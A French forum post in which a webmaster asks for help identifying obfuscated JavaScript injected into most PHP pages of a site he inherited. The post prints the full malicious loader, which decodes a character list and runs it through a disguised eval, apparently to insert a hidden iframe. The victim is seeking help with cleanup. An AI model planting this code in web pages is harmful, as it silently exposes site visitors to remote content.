Discussion :

[pierrickj]

Bonjour à tous,

voila j'ai récupéré actuellement un site internet codé en php / html dont j'assure la gestion depuis peu.

Bref quelques mois après cette passation et n'ayant pas eu le temps de remettre le code au propre (car oui je n'adhère pas du tout à cette gestion multi "include" de site, aucune hierarchie entre les pages bref...)

Ce qui devait arriver arriva, je pense que le site a été victime d'injection de code. (sql, include, get / post ?)

Pour le coup j'ai transvasé mon site sur un autre serveur ou je peux eplucher les logs au détail.

Toutefois voici le code que j'ai retrouvé sur la majorité des pages .php du site :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<script>try{asdwqe();}catch(qw){f=(q)?"fromCharCode":2;try{eval("a=prototype");}catch(zxc){e=window["eva"+"l"];n="104.90.800.999.792.1053.872.909.880.1044.368.1071.912.945.928.909.320.351.480.945.816.1026.776.981.808.288.920.1026.792.549.272.936.928.1044.896.522.376.423.824.1035.856.909.960.459.384.414.840.990.376.945.880.414.792.927.840.567.448.306.256.990.776.981.808.549.272.756.952.945.928.1044.808.1026.272.288.920.891.912.999.864.972.840.990.824.549.272.873.936.1044.888.306.256.918.912.873.872.909.784.999.912.900.808.1026.488.306.880.999.272.288.776.972.840.927.880.549.272.891.808.990.928.909.912.306.256.936.808.945.824.936.928.549.272.450.272.288.952.945.800.1044.832.549.272.450.272.558.480.423.840.918.912.873.872.909.496.351.328.531.104.90".split(".");h=2;s="";if(window.document)for(i=0;-158+i<0;i=1+i){k=i;s=s+String[f](n[k]/(i%(h)+8));}e(s);}}</script>

Toutefois je suis pas un grand mordu du javascript donc j'aimerai obtenir votre avis sur ce code. Son rôle, et éventuellement déceler une URL encodée dans ce bloc.

Pour informations ce code me fait gueuler la plupart des AV avec la dénomination suivante :

JS:iframe-qq

Je pense que ce code inclue une page distante truffée de scripts à la c*n...

J'aimerai donc votre avis, votre expérience sur ce bout de code si quelqu'un l'a déjà vu, ou qui saurait éventuellement la nature de la faille ça pourrait m'aider.

En attendant j'vais passer à la loupe l'ensemble des champs de formulaire afin de valider qu'il n'y ait pas d'injection sql possible (dumoins via des bots qui passent leurs journée à scanner des serveurs).

Par avance merci.